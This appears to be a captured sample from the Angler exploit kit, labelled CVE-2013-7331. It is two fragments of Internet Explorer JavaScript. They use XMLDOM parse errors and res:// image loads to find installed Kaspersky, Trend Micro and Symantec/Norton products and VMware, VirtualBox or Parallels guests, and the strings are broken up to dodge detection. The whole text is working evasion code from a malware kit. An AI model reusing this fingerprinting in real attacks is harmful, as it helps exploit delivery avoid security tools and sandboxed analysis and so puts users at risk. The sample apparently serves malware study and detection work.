AnglerEK_CVE-2013-7331_2014-10-11

1.   function gs7sfd(txt) {
2.       var v1 = 'XM' + 'LD' + 'OM',
3.           v2 = 'pa' + 'rseE' + 'rr' + 'or',
4.           v3 = 'loa' + 'dX' + 'ML',
5.           v4 = 'DT' + 'D X' + 'HTML 1.0 Transitional',
6.           v5 = 'err' + 'orC' + 'ode';
7.       var resInf = new ActiveXObject("Microsoft." + v1),
8.           subpath = "c:\\Windows\\System32\\drivers\\" + txt + ".sys";
9.       resInf.async = true;
10.       resInf[v3]('<!DOCTYPE html PUBLIC "-//W3C//' + v4 + '//EN" "res://' + subpath + '">');
11.       if (resInf[v2][v5] != 0) {
12.           var pe = resInf[v2],
13.               err = "Error Code: " + pe[v5] + "\n";
14.           err += "Error Reason: " + pe.reason;
15.           err += "Error Line: " + pe.line;
16.           if (err.indexOf("-2147023083") > 0) {
17.               return 1;
18.           } else {
19.               return 0;
20.           }
21.       }
22.       return 0;
23.   }
24.   var tmp;
25.   try {
26.       tmp = new ActiveXObject('Kaspersky.IeVirtualKeyboardPlugin.JavascriptApi.1');
27.   } catch (e) {
28.       tmp = false;
29.   }
30.   if (tmp || gs7sfd("kl1") || gs7sfd("tmactmon") || gs7sfd("tmcomm") || gs7sfd("tmevtmgr") || gs7sfd("TMEBC32") || gs7sfd("tmeext") || gs7sfd("tmnciesc") || gs7sfd("tmtdi") || gs7sfd("vm3dmp") || gs7sfd("vmusbmouse") || gs7sfd("vmmouse") || gs7sfd("vmhgfs") || gs7sfd("VBoxGuest") || gs7sfd("VBoxMouse") || gs7sfd("VBoxSF") || gs7sfd("VBoxVideo") || gs7sfd("prl_boot") || gs7sfd("prl_fs") || gs7sfd("prl_kmdd") || gs7sfd("prl_memdev") || gs7sfd("prl_mouf") || gs7sfd("prl_pv32") || gs7sfd("prl_sound") || gs7sfd("prl_strg") || gs7sfd("prl_tg") || gs7sfd("prl_time")) {
31.       Target();
32.   } else {
33.       function Check(s) {
34.           x = new Image();
35.           x.onload = Target;
36.           x.src = s;
37.           return 0;
38.       }
39.       var kv1 = "res://C:\\Program Files",
40.           kv2 = "\\Kaspersky Lab\\Kaspersky ",
41.           kv3 = "Anti-Virus ",
42.           kv4 = "Internet Security ",
43.           kv5 = "\\shellex.dll/#2/#102",
44.           kv6 = "\\mfc42.dll/#2/#26567",
45.           pathdata = [kv1 + kv2 + kv3 + '5.0 for Windows Workstations' + kv5, kv1 + kv2 + kv3 + '6.0 for Windows Workstations' + kv5, kv1 + kv2 + kv3 + '6.0' + kv5, kv1 + kv2 + kv3 + '7.0' + kv5, kv1 + kv2 + kv3 + '2009' + kv6, kv1 + kv2 + kv3 + '2010' + kv6, kv1 + kv2 + kv3 + '2011\\avzkrnl.dll/#2/BBALL', kv1 + kv2 + kv3 + '2012\\x86' + kv6, kv1 + kv2 + kv3 + '2013\\x86' + kv6, kv1 + kv2 + kv4 + '6.0' + kv5, kv1 + kv2 + kv4 + '7.0' + kv5, kv1 + kv2 + kv4 + '2009' + kv6, kv1 + kv2 + kv4 + '2010' + kv6, kv1 + kv2 + kv4 + '2011\\avzkrnl.dll/#2/BBALL', kv1 + kv2 + kv4 + '2012\\x86' + kv6, kv1 + kv2 + kv4 + '2013\\x86' + kv6, kv1 + kv2 + kv4 + '14.0.0\\x86' + kv6, kv1 + kv2 + kv4 + '15.0.0\\x86' + kv6, kv1 + kv2 + 'PURE' + kv6, kv1 + kv2 + 'PURE 2.0\\x86' + kv6, kv1 + kv2 + 'PURE 3.0\\x86' + kv6, kv1 + ' (x86)' + kv2 + kv3 + '2013\\x86' + kv6, kv1 + ' (x86)' + kv2 + kv4 + '2013\\x86' + kv6, kv1 + ' (x86)' + kv2 + 'PURE' + kv6, kv1 + ' (x86)' + kv2 + 'PURE 2.0\\x86' + kv6, kv1 + ' (x86)' + kv2 + 'PURE 3.0\\x86' + kv6, 'res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567', 'res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996', 'res://C:\\Program Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110', 'res://C:\\Program Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204'];
46.  
47. [-----]
48.  
49.  
50.   function gs7sfd(txt) {
51.       var v1 = 'XM' + 'LD' + 'OM',
52.           v2 = 'pa' + 'rseE' + 'rr' + 'or',
53.           v3 = 'loa' + 'dX' + 'ML',
54.           v4 = 'DT' + 'D X' + 'HTML 1.0 Transitional',
55.           v5 = 'err' + 'orC' + 'ode';
56.       var resInf = new ActiveXObject("Microsoft." + v1),
57.           subpath = "c:\\Windows\\System32\\drivers\\" + txt + ".sys";
58.       resInf.async = true;
59.       resInf[v3]('<!DOCTYPE html PUBLIC "-//W3C//' + v4 + '//EN" "res://' + subpath + '">');
60.       if (resInf[v2][v5] != 0) {
61.           var pe = resInf[v2],
62.               err = "Error Code: " + pe[v5] + "\n";
63.           err += "Error Reason: " + pe.reason;
64.           err += "Error Line: " + pe.line;
65.           if (err.indexOf("-2147023083") > 0) {
66.               return 1;
67.           } else {
68.               return 0;
69.           }
70.       }
71.       return 0;
72.   }
73.   var stopFlag;
74.   if (gs7sfd("SYMEVENT")) {
75.       stopFlag = true;
76.   } else {
77.       try {
78.           var stopFlag = new ActiveXObject("Symantec.IPS.WebProtection.1");
79.       } catch (e) {
80.           stopFlag = false;
81.       }
82.       if (!stopFlag) {
83.           function Target() {
84.               stopFlag = true;
85.           }
86.  
87.           function Check(s) {
88.               x = new Image();
89.               x.onload = Target;
90.               x.src = s;
91.               return 0;
92.           }
93.           pathdata = ["res://C:\\Program Files\\Norton Internet Security\\Engine\\21.1.0.18\\asOEHook.dll/#2/#102", "res://C:\\Program Files\\Norton Internet Security\\Engine\\21.6.0.32\\asOEHook.dll/#2/#102"];
94.           for (var i = 0; i < pathdata.length; ++i) Check(pathdata[i]);
95.  
96.           function pauseIt(millis) {
97.               var date = new Date();
98.               var curDate = null;
99.               do {
100.                   curDate = new Date();
101.               } while (curDate - date < millis);
102.           }
103.           pauseIt(1000);
104.       }
105.   }